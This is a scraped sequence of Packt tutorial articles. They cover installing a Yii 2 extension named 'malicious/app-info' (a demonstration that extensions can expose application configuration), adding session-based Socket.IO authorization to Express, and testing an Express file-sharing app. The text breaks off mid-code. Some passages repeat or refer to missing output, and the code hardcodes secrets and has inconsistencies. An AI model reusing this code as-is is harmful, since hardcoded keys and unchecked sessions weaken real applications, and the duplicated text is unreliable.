Con: There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest to the repositories section is overwhelming and leads to code duplication.
Con: The manifest from the extension package will not be processed at all. This means that you cannot just strip the entry in repositories down to only the dist and name sections, because the Yii 2 installer will not be able to get to the autoload and extra sections.

The last method is to use a local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed there, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself.
After this, you run Composer on the machine that really has this URL accessible (you can use http:// type URLs, of course, too), and then you get the following response from Composer:

To check that Yii 2 really installed the extension, you can open the file vendor/yiisoft/extensions.php and check whether it contains the following block now:

'malicious/app-info' =>
array (
    'name' => 'malicious/app-info',
    'version' => '1.0.0.0',
    'alias' =>
    array (
        '@malicious' => $vendorDir . '/malicious/app-info',
    ),
    'bootstrap' => 'malicious\Bootstrap',
),

(The indentation was preserved as is from the actual file.) If this block is indeed there, then all you need to do is open the /app-info/configuration route and see whether it reports JSON to you. It should.

The pros and cons of the file-based installation are as follows:

Pro: You can specify any file as long as it is reachable by some URL, and ZIP archive management capabilities exist on virtually any kind of platform today.
Pro: You don't need to set up any version control system repository (a benefit of dubious value, though).
Con: There is too much work in the composer.json manifest file of the target application. The requirement to copy the entire manifest to the repositories section is overwhelming and leads to code duplication.
Con: The manifest from the extension package will not be processed at all. This means that you cannot just strip the entry in repositories down to only the dist and name sections, because the Yii 2 installer will not be able to get to the autoload and extra sections.

The last method is to use a local version control system repository. We already have everything committed to the Git repository, and we have the correct tag placed there, corresponding to the version we declared in the manifest. This is everything we need to prepare inside the extension itself.

Now, we need to modify the target application's manifest to add the repositories section in the same way we did previously, but this time we will introduce a lot less code there:

"repositories": [
    {
        "type": "git",
        "url": "/home/vagrant/yii2-malicious/" // put your own URL here
    }
]

All that's needed from you is to specify the correct URL to the Git repository of the extension we were preparing at the beginning of this article. After you specify this repository in the target application's composer manifest, you can just issue the desired command:

$ php composer.phar require "malicious/app-info:1.0.0"

Everything will be installed as usual. Confirm the successful installation again by having a look at the contents of vendor/yiisoft/extensions.php and by accessing the /app-info/configuration route in the application.

The pros and con of the repository-based installation are as follows:

Pro: Relatively little code to write in the application's manifest.
Pro: You don't need to really publish your extension (or the package in general). In some settings, for example, for closed-source software, this is really useful.
Con: You still have to meddle with the manifest of the application itself, which can be out of your control; in this case, you'll have to guide your users on how to install your extension, which is not good for PR.

In short, the following pieces inside the composer.json manifest turn an arbitrary Composer package into a Yii 2 extension.

First, we tell Composer to use the special Yii 2 installer for packages, as follows:

"type": "yii2-extension"

Then, we tell the Yii 2 extension installer where the bootstrap for the extension (if any) is, as follows:

"extra": {
    "bootstrap": "<fully qualified class name>"
}

Next, we tell the Yii 2 extension installer how to prepare aliases for your extension so that classes can be autoloaded, as follows:

"autoload": {
    "psr-4": {
        "<namespace prefix>": "<folder path>"
    }
}

Finally, we add the explicit requirement of the Yii 2 framework itself in the following code, so we'll be sure that the Yii 2 extension installer will be available at all:

"require": {
    "yiisoft/yii2": "*"
}

Everything else is the usual detail of installing any other Composer package, which you can read about in the official Composer documentation.
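Putting it together, the relevant fragment of the target application's composer.json for this Git-based installation could look like the following sketch (the require constraint matches the tag we created earlier):

{
    "require": {
        "malicious/app-info": "1.0.0"
    },
    "repositories": [
        {
            "type": "git",
            "url": "/home/vagrant/yii2-malicious/"
        }
    ]
}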
Summary

In this article, we looked at how Yii 2 implements its extensions so that they're easily installable by a single Composer invocation and can be automatically attached to the application afterwards. We learned that this requires some level of integration between these two systems, Yii 2 and Composer, which in turn requires some additional preparation from you as a developer of the extension.

We used a really silly, even slightly dangerous, example of an extension. This was for three reasons:

The extension was fun to make (we hope)
We showed that using the bootstrap mechanics, we can basically wire up the pieces of the extension to the target application automatically, without any need for elaborate manual installation instructions
We showed the potential danger in installing random extensions from the Web, as an extension can run absolutely arbitrary code right at the application initialization and, more than that, at each request made to the application

We have discussed three methods of distributing Composer packages, which also apply to Yii 2 extensions. The general rule of thumb is this: if you want your extension to be publicly available, just use the Packagist service. In any other case, use local repositories, as you can use both local filesystem paths and web URLs with them. We also looked at the option of attaching the extension completely manually, without using the Composer installation at all.

Resources for Article:

Further resources on this subject:
Yii: Adding Users and User Management to Your Site [Article]
Meet Yii [Article]
Yii 1.1: Using Zii Components [Article]

Using Socket.IO and Express together

Packt
23 Sep 2014
16 min read
In this article, Joshua Johanan, the author of the book Building Scalable Apps with Redis and Node.js, tells us that the Express application is just the foundation. We are going to add features until it is a fully usable app. We can currently serve web pages and respond to HTTP, but now we want to add real-time communication. It's very fortunate that we just spent most of this article learning about Socket.IO; it does just that! Let's see how we are going to integrate Socket.IO with an Express application.

(For more resources related to this topic, see here.)

We are going to use Express and Socket.IO side by side. Socket.IO does not use HTTP like a web application. It is event based, not request based. This means that Socket.IO will not interfere with the Express routes that we have set up, and that's a good thing. The bad thing is that we will not have access in Socket.IO to all the middleware that we set up for Express. There are some frameworks that combine these two, but such a framework still has to convert the request from Express into something that Socket.IO can use. I am not trying to knock down these frameworks. They simplify a complex problem and, most importantly, they do it well (Sails is a great example of this). Our app, though, is going to keep Socket.IO and Express separated as much as possible, with the least number of dependencies. We know that Socket.IO does not need Express, as none of our earlier examples used Express in any way. This has the added benefit that we can break off our Socket.IO module and run it as its own application at a future point in time. The other great benefit is that we learn how to do it ourselves.

We need to go into the directory where our Express application is. Make sure that our package.json has all the additional packages for this article and run npm install. The first thing we need to do is add our configuration settings.

Adding Socket.IO to the config

We will use the same config file that we created for our Express app. Open up config.js and change the file to what I have done in the following code:

var config = {
    port: 3000,
    secret: 'secret',
    redisPort: 6379,
    redisHost: 'localhost',
    routes: {
        login: '/account/login',
        logout: '/account/logout'
    }
};
module.exports = config;

We are adding two new attributes, redisPort and redisHost. This is because of how the redis package configures its clients. We are also removing the redisUrl attribute. We can configure all our clients with just these two Redis config options.

Next, create a directory named socket.io under the root of our project. Then, create a file called index.js. This is where we will initialize Socket.IO and wire up all our event listeners and emitters. We are just going to use one namespace for our application. If we were to add multiple namespaces, I would just add them as files underneath the socket.io directory.

Open up app.js and change the following lines in it:

//variable declarations at the top
var io = require('./socket.io');

//after all the middleware and routes
var server = app.listen(config.port);
io.startIo(server);

We will define the startIo function shortly, but let's talk about our app.listen change. Previously, we executed app.listen without capturing its return value in a variable; now we do. Socket.IO listens using Node's http.createServer. It does this automatically if you pass a number into its listen function. When Express executes app.listen, it returns an instance of the HTTP server. We capture that, and now we can pass the HTTP server to Socket.IO's listen function.
Let's create that startIo function. Open up index.js in the socket.io directory and add the following lines of code to it:

var io = require('socket.io');
var config = require('../config');

var socketConnection = function socketConnection(socket){
    socket.emit('message', {message: 'Hey!'});
};

exports.startIo = function startIo(server){
    io = io.listen(server);
    var packtchat = io.of('/packtchat');
    packtchat.on('connection', socketConnection);
    return io;
};

We are exporting the startIo function, which expects a server object that goes right into Socket.IO's listen function. This should start Socket.IO serving. Next, we get a reference to our namespace and listen on the connection event, sending a message event back to the client. We are also loading our configuration settings.

Let's add some code to the layout and see whether our application has real-time communication. We will need the Socket.IO client library, so link to it from node_modules like you have been doing, and put it in our static directory under a newly created js directory. Open layout.ejs in packtchat/views and add the following lines to it:

<!-- put these right before the body end tag -->
<script type="text/javascript" src="/js/socket.io.js"></script>
<script>
    var socket = io.connect("http://localhost:3000/packtchat");
    socket.on('message', function(d){
        console.log(d);
    });
</script>

We just listen for a message event and log it to the console. Fire up Node and load your application at http://localhost:3000. Check to see whether you get a message in your console. You should see your message logged to the console, as seen in the following screenshot:

Success! Our application now has real-time communication. We are not done, though. We still have to wire up all the events for our app.

Who are you?

There is one glaring issue. How do we know who is making the requests? Express has middleware that parses the session to see if someone has logged in. Socket.IO does not even know about a session. Socket.IO lets anyone connect who knows the URL. We do not want anonymous connections that can listen to all our events and send events to the server. We only want authenticated users to be able to create a WebSocket. We need to give Socket.IO access to our sessions.

Authorization in Socket.IO

We haven't discussed it yet, but Socket.IO has middleware. Before the connection event gets fired, we can execute a function and either allow the connection or deny it. This is exactly what we need.

Using the authorization handler

Authorization can happen at two places: on the default namespace or on a named namespace connection. Both authorizations happen through the handshake. The function's signature is the same either way. It will be passed the socket, which has some things we need, such as the connection's headers, for example. For now, we will add a simple authorization function to see how it works with Socket.IO.
Open up index.js in packtchat/socket.io and add a new function that will sit next to the socketConnection function, as seen in the following code:

var io = require('socket.io');

var socketAuth = function socketAuth(socket, next){
    return next();
    return next(new Error('Nothing Defined'));
};

var socketConnection = function socketConnection(socket){
    socket.emit('message', {message: 'Hey!'});
};

exports.startIo = function startIo(server){
    io = io.listen(server);
    var packtchat = io.of('/packtchat');
    packtchat.use(socketAuth);
    packtchat.on('connection', socketConnection);
    return io;
};

I know that there are two returns in this function. We are going to comment one out, load the site, and then switch which line is commented out. The socket that is passed in has a reference to the handshake data that we will use shortly. The next function works just like it does in Express. If we execute it without anything, the middleware chain will continue. If it is executed with an error, it will stop the chain. Let's load up our site and test both paths by switching which return gets executed.

We can now allow or deny connections as we please, but how do we know who is trying to connect?

Cookies and sessions

We will do it the same way Express does. We will look at the cookies that are passed and see if there is a session. If there is a session, then we will load it up and see what is in it. At this point, we should have the same knowledge about the Socket.IO connection that Express has about a request.

The first thing we need is a cookie parser. We will use a very aptly named package called cookie. This should already be installed if you updated your package.json and installed all the packages. Add a reference to it at the top of index.js in packtchat/socket.io, with all the other variable declarations:

var cookie = require('cookie');

And now we can parse our cookies. Socket.IO passes the cookie with the socket object in our middleware. Here is how we parse it. Add the following code to the socketAuth function:

var handshakeData = socket.request;
var parsedCookie = cookie.parse(handshakeData.headers.cookie);

At this point, we will have an object that has our connect.sid in it. Remember that this is a signed value. We cannot use it as it is right now to get the session ID. We will need to parse this signed cookie. This is where cookie-parser comes in. We will now create a reference to it, as follows:

var cookieParser = require('cookie-parser');

We can now parse the signed connect.sid cookie to get our session ID. Add the following code right after our parsing code:

var sid = cookieParser.signedCookie(parsedCookie['connect.sid'], config.secret);

This will take the value from parsedCookie and, using our secret passphrase, return the unsigned value. We will do a quick check to make sure this was a valid signed cookie by comparing the unsigned value to the original:

if (parsedCookie['connect.sid'] === sid)
    return next(new Error('Not Authenticated'));

This check will make sure we are only using valid signed session IDs. The following screenshot will show you the values of an example Socket.IO authorization with a cookie:
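To make the signing mechanics a little more concrete, here is a small sketch with made-up values: the session cookie is stored as the raw session ID prefixed with s: and followed by a dot and a signature derived from the secret, and cookieParser.signedCookie() verifies and strips that signature:

// Made-up cookie value, for illustration only
var signedValue = 's:AbC123sessionId.kQ9f2xSignature';
var sid = cookieParser.signedCookie(signedValue, config.secret);
// sid === 'AbC123sessionId' when the signature is valid;
// if the value is not a signed cookie at all, the function returns
// the input unchanged, which is exactly what the equality check
// in socketAuth detects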
Getting the session

We now have a session ID, so we can query Redis and get the session out. The default session store object of Express is extended by connect-redis. To use connect-redis, we use the same session package as we did with Express: express-session. The following code creates all of this in index.js in packtchat/socket.io:

//at the top with the other variable declarations
var expressSession = require('express-session');
var ConnectRedis = require('connect-redis')(expressSession);
var redisSession = new ConnectRedis({host: config.redisHost, port: config.redisPort});

The final line creates the object that will connect to Redis and get our session. This is the same command used with Express when setting the store option for the session. We can now get the session from Redis and see what's inside of it. What follows is the entire socketAuth function along with all our variable declarations:

var io = require('socket.io'),
    connect = require('connect'),
    cookie = require('cookie'),
    expressSession = require('express-session'),
    ConnectRedis = require('connect-redis')(expressSession),
    redis = require('redis'),
    config = require('../config'),
    redisSession = new ConnectRedis({host: config.redisHost, port: config.redisPort});

var socketAuth = function socketAuth(socket, next){
    var handshakeData = socket.request;
    var parsedCookie = cookie.parse(handshakeData.headers.cookie);
    var sid = connect.utils.parseSignedCookie(parsedCookie['connect.sid'], config.secret);
    if (parsedCookie['connect.sid'] === sid)
        return next(new Error('Not Authenticated'));
    redisSession.get(sid, function(err, session){
        if (session.isAuthenticated)
        {
            socket.user = session.user;
            socket.sid = sid;
            return next();
        }
        else
            return next(new Error('Not Authenticated'));
    });
};

We can use redisSession and sid to get the session out of Redis and check its attributes. As far as our packages are concerned, we are just another Express app getting session data. Once we have the session data, we check the isAuthenticated attribute. If it's true, we know the user is logged in. If not, we do not let them connect yet.

We are adding properties to the socket object to store information from the session. Later on, after a connection is made, we can get this information. As an example, we are going to change our socketConnection function to send the user object to the client. The following should be our socketConnection function:

var socketConnection = function socketConnection(socket){
    socket.emit('message', {message: 'Hey!'});
    socket.emit('message', socket.user);
};

Now, let's load up our browser and go to http://localhost:3000. Log in and then check the browser's console. The following screenshot will show that the client is receiving the messages:

Adding application-specific events

The next thing to do is build out all the real-time events that Socket.IO is going to listen for and respond to. We are just going to create the skeleton for each of these listeners. Open up index.js in packtchat/socket.io and change the entire socketConnection function to the following code:

var socketConnection = function socketConnection(socket){
    socket.on('GetMe', function(){});
    socket.on('GetUser', function(room){});
    socket.on('GetChat', function(data){});
    socket.on('AddChat', function(chat){});
    socket.on('GetRoom', function(){});
    socket.on('AddRoom', function(r){});
    socket.on('disconnect', function(){});
};

Most of our emit events will happen in response to a listener.
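As a hint of how these skeletons will eventually be filled in, here is a hedged sketch (the reply event name is an assumption for illustration) showing the GetMe listener answering with the user object that our authorization middleware attached to the socket:

socket.on('GetMe', function(){
    // Reply with the session user stored on the socket during auth
    socket.emit('GetMe', socket.user);
});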
Using Redis as the store for Socket.IO

The final thing we are going to add is switching Socket.IO's internal store to Redis. By default, Socket.IO uses a memory store to save any data you attach to a socket. As we know now, we cannot have application state that is stored on only one server. We need to store it in Redis. Therefore, we add it to index.js in packtchat/socket.io. Add the following line to the variable declarations:

var redisAdapter = require('socket.io-redis');

An application state is a flexible idea. We can store the application state locally when the state does not need to be shared; a simple example is keeping the path to a local temp file. When the data will be needed by multiple connections, it must be put into a shared space. Anything tied to a user's session will need to be shared, for example.

The next thing we need to do is add some code to our startIo function. The following code is what our startIo function should look like:

exports.startIo = function startIo(server){
    io = io.listen(server);
    io.adapter(redisAdapter({host: config.redisHost, port: config.redisPort}));
    var packtchat = io.of('/packtchat');
    packtchat.use(socketAuth);
    packtchat.on('connection', socketConnection);
    return io;
};

The first thing is to start the server listening. Next, we call io.adapter, passing it a Redis adapter configured with our Redis host and port, so that the adapter can create the Redis connections it needs.

Socket.IO inner workings

We are not going to completely dive into everything that Socket.IO does, but we will discuss a few topics.

WebSockets

This is what makes Socket.IO work. All web servers serve HTTP; that is what makes them web servers. This works great when all you want to do is serve pages, which are served based on requests. The browser must ask for information before receiving it. If you want to have real-time connections, though, this is difficult and requires some workarounds. HTTP was not designed to have the server initiate the request. This is where WebSockets come in. WebSockets allow the server and client to create a connection and keep it open. Inside of this connection, either side can send messages back and forth. This is what Socket.IO (technically, Engine.io) leverages to create real-time communication.

Socket.IO even has fallbacks if you are using a browser that does not support WebSockets. The browsers that do support WebSockets at the time of writing include the latest versions of Chrome, Firefox, Safari, Safari on iOS, Opera, and IE 11. This means the browsers that do not support WebSockets are all the older versions of IE. For those, Socket.IO will use different techniques to simulate a WebSocket connection. This involves creating an Ajax request and keeping the connection open for a long time. If data needs to be sent, it is sent in an Ajax request. Eventually, that request closes and the client immediately creates another request. Socket.IO even has an Adobe Flash implementation if you have to support really old browsers (IE 6, for example); it is not enabled by default.

WebSockets are also a little different when it comes to scaling our application. Because each WebSocket creates a persistent connection, we may need more servers to handle Socket.IO traffic than regular HTTP. For example, when someone connects and chats for an hour, there will only have been one or two HTTP requests. In contrast, a WebSocket will have to stay open for the entire hour. The way our code base is written, we can easily scale up more Socket.IO servers by themselves.

Ideas to take away from this article

The first takeaway is that for every emit, there needs to be an on. This is true whether the sender is the server or the client.
It is always best to sit down and map out each event and the direction it is going. The next idea of note is building our app out of loosely coupled modules. Our app.js kicks off everything that deals with Express. Then, it fires the startIo function. While we do pass it a server object, we could easily create one ourselves and use that instead. Socket.IO just wants a basic HTTP server. In fact, you can just pass the port, which is what we did in our first couple of Socket.IO applications (Ping-Pong). If we wanted to create an application layer of Socket.IO servers, we could refactor this code out and have all the Socket.IO servers run on machines separate from Express.

Summary

At this point, we should feel comfortable using real-time events in Socket.IO. We should also know how to namespace our io server and create groups of users. We also learned how to authorize socket connections to only allow logged-in users to connect.

Resources for Article:

Further resources on this subject:
Exploring streams [article]
Working with Data Access and File Formats Using Node.js [article]
So, what is Node.js? [article]

Improving Code Quality

Packt
22 Sep 2014
18 min read
In this article by Alexandru Vlăduţu, author of Mastering Web Application Development with Express, we are going to see how to test Express applications and how to improve the quality of our code by leveraging existing NPM modules.

(For more resources related to this topic, see here.)

Creating and testing an Express file-sharing application

Now, it's time to see how to develop and test an Express application with what we have learned previously. We will create a file-sharing application that allows users to upload files and password-protect them if they choose to. After uploading the files to the server, we will create a unique ID for that file, store the metadata along with the content (as a separate JSON file), and redirect the user to the file's information page. When trying to access a password-protected file, an HTTP basic authentication pop up will appear, and the user will have to enter only the password (no username in this case).

The package.json file, so far, will contain the following code:

{
  "name": "file-uploading-service",
  "version": "0.0.1",
  "private": true,
  "scripts": {
    "start": "node ./bin/www"
  },
  "dependencies": {
    "express": "~4.2.0",
    "static-favicon": "~1.0.0",
    "morgan": "~1.0.0",
    "cookie-parser": "~1.0.1",
    "body-parser": "~1.0.0",
    "debug": "~0.7.4",
    "ejs": "~0.8.5",
    "connect-multiparty": "~1.0.5",
    "cuid": "~1.2.4",
    "bcrypt": "~0.7.8",
    "basic-auth-connect": "~1.0.0",
    "errto": "~0.2.1",
    "custom-err": "0.0.2",
    "lodash": "~2.4.1",
    "csurf": "~1.2.2",
    "cookie-session": "~1.0.2",
    "secure-filters": "~1.0.5",
    "supertest": "~0.13.0",
    "async": "~0.9.0"
  },
  "devDependencies": {}
}

When bootstrapping an Express application using the CLI, a /bin/www file will be automatically created for you. The following is the version we have adopted, which extracts the name of the application from the package.json file. This way, in case we decide to change the name, we won't have to alter our debugging code, because it will automatically adapt to the new name:

#!/usr/bin/env node
var pkg = require('../package.json');
var debug = require('debug')(pkg.name + ':main');
var app = require('../app');

app.set('port', process.env.PORT || 3000);

var server = app.listen(app.get('port'), function() {
  debug('Express server listening on port ' + server.address().port);
});

The application configurations will be stored inside config.json:

{
  "filesDir": "files",
  "maxSize": 5
}

The properties listed in the preceding code refer to the files folder (where the files will be uploaded), which is relative to the root, and the maximum allowed file size (in megabytes).

The main file of the application is named app.js and lives in the root. We need the connect-multiparty module to support file uploads, and the csurf and cookie-session modules for CSRF protection. The rest of the dependencies are standard, and we have used them before.
The full code for the app.js file is as follows:

var express = require('express');
var path = require('path');
var favicon = require('static-favicon');
var logger = require('morgan');
var cookieParser = require('cookie-parser');
var session = require('cookie-session');
var bodyParser = require('body-parser');
var multiparty = require('connect-multiparty');
var Err = require('custom-err');
var csrf = require('csurf');
var ejs = require('secure-filters').configure(require('ejs'));
var csrfHelper = require('./lib/middleware/csrf-helper');
var homeRouter = require('./routes/index');
var filesRouter = require('./routes/files');
var config = require('./config.json');

var app = express();
var ENV = app.get('env');

// view engine setup
app.engine('html', ejs.renderFile);
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'html');

app.use(favicon());
app.use(bodyParser.json());
app.use(bodyParser.urlencoded());
// Limit uploads to X Mb
app.use(multiparty({ maxFilesSize: 1024 * 1024 * config.maxSize }));
app.use(cookieParser());
app.use(session({ keys: ['rQo2#0s!qkE', 'Q.ZpeR49@9!szAe'] }));
app.use(csrf());
// add CSRF helper
app.use(csrfHelper);

app.use('/', homeRouter);
app.use('/files', filesRouter);
app.use(express.static(path.join(__dirname, 'public')));

/// catch 404 and forward to error handler
app.use(function(req, res, next) {
  next(Err('Not Found', { status: 404 }));
});

/// error handlers

// development error handler
// will print stacktrace
if (ENV === 'development') {
  app.use(function(err, req, res, next) {
    res.status(err.status || 500);
    res.render('error', {
      message: err.message,
      error: err
    });
  });
}

// production error handler
// no stacktraces leaked to user
app.use(function(err, req, res, next) {
  res.status(err.status || 500);
  res.render('error', {
    message: err.message,
    error: {}
  });
});

module.exports = app;

Instead of directly binding the application to a port, we are exporting it, which makes our lives easier when testing with supertest. We won't need to care about things such as the default port availability or specifying a different port environment variable when testing.

To avoid having to create the whole input when including the CSRF token, we have created a helper for it inside lib/middleware/csrf-helper.js:

module.exports = function(req, res, next) {
  res.locals.csrf = function() {
    return "<input type='hidden' name='_csrf' value='" + req.csrfToken() + "' />";
  }
  next();
};

For the password-protection functionality, we will use the bcrypt module and create a separate file inside lib/hash.js for the hash generation and password-compare functionality:

var bcrypt = require('bcrypt');
var errTo = require('errto');

var Hash = {};

Hash.generate = function(password, cb) {
  bcrypt.genSalt(10, errTo(cb, function(salt) {
    bcrypt.hash(password, salt, errTo(cb, function(hash) {
      cb(null, hash);
    }));
  }));
};

Hash.compare = function(password, hash, cb) {
  bcrypt.compare(password, hash, cb);
};

module.exports = Hash;
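As a quick illustration of how this module is meant to be consumed (the password value here is made up), generating a hash and comparing a candidate password against it could look like this:

var hash = require('./lib/hash');

hash.generate('s3cret', function(err, hashedPassword) {
  if (err) { throw err; }
  // hashedPassword can now be stored in the file's metadata
  hash.compare('s3cret', hashedPassword, function(err, match) {
    if (err) { throw err; }
    console.log(match ? 'passwords match' : 'passwords differ');
  });
});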
The biggest file of our application will be the file model, because that's where most of the functionality will reside. We will use the cuid() module to create unique IDs for files, and the native fs module to interact with the filesystem. The following code snippet contains the most important methods of models/file.js:

function File(options, id) {
  this.id = id || cuid();
  this.meta = _.pick(options, ['name', 'type', 'size', 'hash', 'uploadedAt']);
  this.meta.uploadedAt = this.meta.uploadedAt || new Date();
};

File.prototype.save = function(path, password, cb) {
  var _this = this;
  this.move(path, errTo(cb, function() {
    if (!password) { return _this.saveMeta(cb); }
    hash.generate(password, errTo(cb, function(hashedPassword) {
      _this.meta.hash = hashedPassword;
      _this.saveMeta(cb);
    }));
  }));
};

File.prototype.move = function(path, cb) {
  fs.rename(path, this.path, cb);
};

For the full source code of the file, browse the code bundle.

Next, we will create the routes for the file (routes/files.js), which will export an Express router. As mentioned before, the authentication mechanism for password-protected files will be HTTP basic authentication, so we will need the basic-auth-connect module. At the beginning of the file, we will include the dependencies and create the router:

var express = require('express');
var basicAuth = require('basic-auth-connect');
var errTo = require('errto');
var pkg = require('../package.json');
var File = require('../models/file');
var debug = require('debug')(pkg.name + ':filesRoute');
var router = express.Router();

We will have to create two routes that include the id parameter in the URL: one for displaying the file information and another one for downloading the file. In both cases, we need to check whether the file exists and require user authentication in case it's password-protected. This is an ideal use case for the router.param() function, because these actions will be performed each time there is an id parameter in the URL. The code is as follows:

router.param('id', function(req, res, next, id) {
  File.find(id, errTo(next, function(file) {
    debug('file', file);
    // populate req.file, will need it later
    req.file = file;

    if (file.isPasswordProtected()) {
      // Password-protected file, check for password using HTTP basic auth
      basicAuth(function(user, pwd, fn) {
        if (!pwd) { return fn(); }
        // ignore user
        file.authenticate(pwd, errTo(next, function(match) {
          if (match) { return fn(null, file.id); }
          fn();
        }));
      })(req, res, next);
    } else {
      // Not password-protected, proceed normally
      next();
    }
  }));
});

The rest of the routes are fairly straightforward, using response.download() to send the file to the client, or response.redirect() after uploading the file:

router.get('/', function(req, res, next) {
  res.render('files/new', { title: 'Upload file' });
});

router.get('/:id.html', function(req, res, next) {
  res.render('files/show', {
    id: req.params.id,
    meta: req.file.meta,
    isPasswordProtected: req.file.isPasswordProtected(),
    hash: hash,
    title: 'Download file ' + req.file.meta.name
  });
});

router.get('/download/:id', function(req, res, next) {
  res.download(req.file.path, req.file.meta.name);
});

router.post('/', function(req, res, next) {
  var tempFile = req.files.file;
  if (!tempFile.size) { return res.redirect('/files'); }

  var file = new File(tempFile);
  file.save(tempFile.path, req.body.password, errTo(next, function() {
    res.redirect('/files/' + file.id + '.html');
  }));
});

module.exports = router;
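Since password-protected files sit behind HTTP basic authentication with an empty username, a client could check access from the command line like this (the ID and password are placeholders; note the leading colon, which sends an empty username):

$ curl -u ":sample-password" http://localhost:3000/files/<id>.html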
class="form-group"> <label>Password protect (leave blank otherwise):</label> <input type="password" name="password" /> </div> <div class="form-group"> <%- csrf() %> <input type="submit" /> </div> </form> <%- include ../layout/footer.html %> To display the file's details, we will create another view (views/files/show.html). Besides showing the basic file information, we will display a special message in case the file is password-protected, so that the client is notified that a password should also be shared along with the link: <%- include ../layout/header.html %> <p> <table> <tr> <th>Name</th> <td><%= meta.name %></td> </tr> <th>Type</th> <td><%= meta.type %></td> </tr> <th>Size</th> <td><%= meta.size %> bytes</td> </tr> <th>Uploaded at</th> <td><%= meta.uploadedAt %></td> </tr> </table> </p> <p> <a href="/files/download/<%- id %>">Download file</a> | <a href="/files">Upload new file</a> </p> <p> To share this file with your friends use the <a href="/files/<%- id %>">current link</a>. <% if (isPasswordProtected) { %> <br /> Don't forget to tell them the file password as well! <% } %> </p> <%- include ../layout/footer.html %> Running the application To run the application, we need to install the dependencies and run the start script: $ npm i $ npm start The default port for the application is 3000, so if we visit http://localhost:3000/files, we should see the following page: After uploading the file, we should be redirected to the file's page, where its details will be displayed: Unit tests Unit testing allows us to test individual parts of our code in isolation and verify their correctness. By making our tests focused on these small components, we decrease the complexity of the setup, and most likely, our tests should execute faster. Using the following command, we'll install a few modules to help us in our quest: $ npm i mocha should sinon––save-dev We are going to write unit tests for our file model, but there's nothing stopping us from doing the same thing for our routes or other files from /lib. The dependencies will be listed at the top of the file (test/unit/file-model.js): var should = require('should'); var path = require('path'); var config = require('../../config.json'); var sinon = require('sinon'); We will also need to require the native fs module and the hash module, because these modules will be stubbed later on. 
Apart from these, we will create an empty callback function and reuse it, as shown in the following code:

// will be stubbing methods on these modules later on
var fs = require('fs');
var hash = require('../../lib/hash');
var noop = function() {};

The tests for the instance methods will be created first:

describe('models', function() {
  describe('File', function() {
    var File = require('../../models/file');

    it('should have default properties', function() {
      var file = new File();
      file.id.should.be.a.String;
      file.meta.uploadedAt.should.be.a.Date;
    });

    it('should return the path based on the root and the file id', function() {
      var file = new File({}, '1');
      file.path.should.eql(File.dir + '/1');
    });

    it('should move a file', function() {
      var stub = sinon.stub(fs, 'rename');
      var file = new File({}, '1');
      file.move('/from/path', noop);
      stub.calledOnce.should.be.true;
      stub.calledWith('/from/path', File.dir + '/1', noop).should.be.true;
      stub.restore();
    });

    it('should save the metadata', function() {
      var stub = sinon.stub(fs, 'writeFile');
      var file = new File({}, '1');
      file.meta = { a: 1, b: 2 };
      file.saveMeta(noop);
      stub.calledOnce.should.be.true;
      stub.calledWith(File.dir + '/1.json', JSON.stringify(file.meta), noop).should.be.true;
      stub.restore();
    });

    it('should check if file is password protected', function() {
      var file = new File({}, '1');
      file.meta.hash = 'y';
      file.isPasswordProtected().should.be.true;
      file.meta.hash = null;
      file.isPasswordProtected().should.be.false;
    });

    it('should allow access if matched file password', function() {
      var stub = sinon.stub(hash, 'compare');
      var file = new File({}, '1');
      file.meta.hash = 'hashedPwd';
      file.authenticate('password', noop);
      stub.calledOnce.should.be.true;
      stub.calledWith('password', 'hashedPwd', noop).should.be.true;
      stub.restore();
    });

We are stubbing the functionalities of the fs and hash modules because we want to test our code in isolation. Once we are done with the tests, we restore the original functionality of the methods. Now that we're done testing the instance methods, we will go on to test the static ones (assigned directly onto the File object):

    describe('.dir', function() {
      it('should return the root of the files folder', function() {
        path.resolve(__dirname + '/../../' + config.filesDir).should.eql(File.dir);
      });
    });

    describe('.exists', function() {
      var stub;

      beforeEach(function() {
        stub = sinon.stub(fs, 'exists');
      });

      afterEach(function() {
        stub.restore();
      });

      it('should callback with an error when the file does not exist', function(done) {
        File.exists('unknown', function(err) {
          err.should.be.an.instanceOf(Error).and.have.property('status', 404);
          done();
        });
        // call the function passed as argument[1] with the parameter `false`
        stub.callArgWith(1, false);
      });

      it('should callback with no arguments when the file exists', function(done) {
        File.exists('existing-file', function(err) {
          (typeof err === 'undefined').should.be.true;
          done();
        });
        // call the function passed as argument[1] with the parameter `true`
        stub.callArgWith(1, true);
      });
    });
  });
});

To stub asynchronous functions and execute their callback, we use the stub.callArgWith() function provided by sinon, which executes the callback found at the given argument index of the stubbed call, passing it the subsequent arguments. For more information, check out the official documentation at http://sinonjs.org/docs/#stubs.

When running tests, Node developers expect the npm test command to be the one that triggers the test suite, so we need to add that script to our package.json file.
However, since we are going to have different kinds of tests to run, it would be even better to add a unit-tests script and make npm test run that for now. The scripts property should look like the following code:

"scripts": {
  "start": "node ./bin/www",
  "unit-tests": "mocha --reporter=spec test/unit",
  "test": "npm run unit-tests"
},

Now, if we run the tests, we should see the following output in the terminal:

Functional tests

So far, we have tested each method to check whether it works fine on its own, but now it's time to check whether our application works according to the specifications when wiring all the things together. Besides the existing modules, we will need to install and use the following ones:

supertest: This is used to test the routes in an expressive manner
cheerio: This is used to extract the CSRF token out of the form and pass it along when uploading the file
rimraf: This is used to clean up our files folder once we're done with the testing

We will create a new file called test/functional/files-routes.js for the functional tests. As usual, we will list our dependencies first:

var fs = require('fs');
var request = require('supertest');
var should = require('should');
var async = require('async');
var cheerio = require('cheerio');
var rimraf = require('rimraf');
var app = require('../../app');

There will be a couple of scenarios to test when uploading a file, such as:

Checking whether a file that is uploaded without a password can be publicly accessible
Checking that a password-protected file can only be accessed with the correct password

We will create a function called uploadFile that we can reuse across different tests. This function will use the same supertest agent when making requests so it can persist the cookies, and will also take care of extracting and sending the CSRF token back to the server when making the POST request. In case a password argument is provided, it will send that along with the file. The function will assert that the status code for the upload page is 200 and that the user is redirected to the file page after the upload.
The full code of the function is listed as follows:

function uploadFile(agent, password, done) {
  agent
    .get('/files')
    .expect(200)
    .end(function(err, res) {
      (err == null).should.be.true;

      var $ = cheerio.load(res.text);
      var csrfToken = $('form input[name=_csrf]').val();
      csrfToken.should.not.be.empty;

      var req = agent
        .post('/files')
        .field('_csrf', csrfToken)
        .attach('file', __filename);

      if (password) {
        req = req.field('password', password);
      }

      req
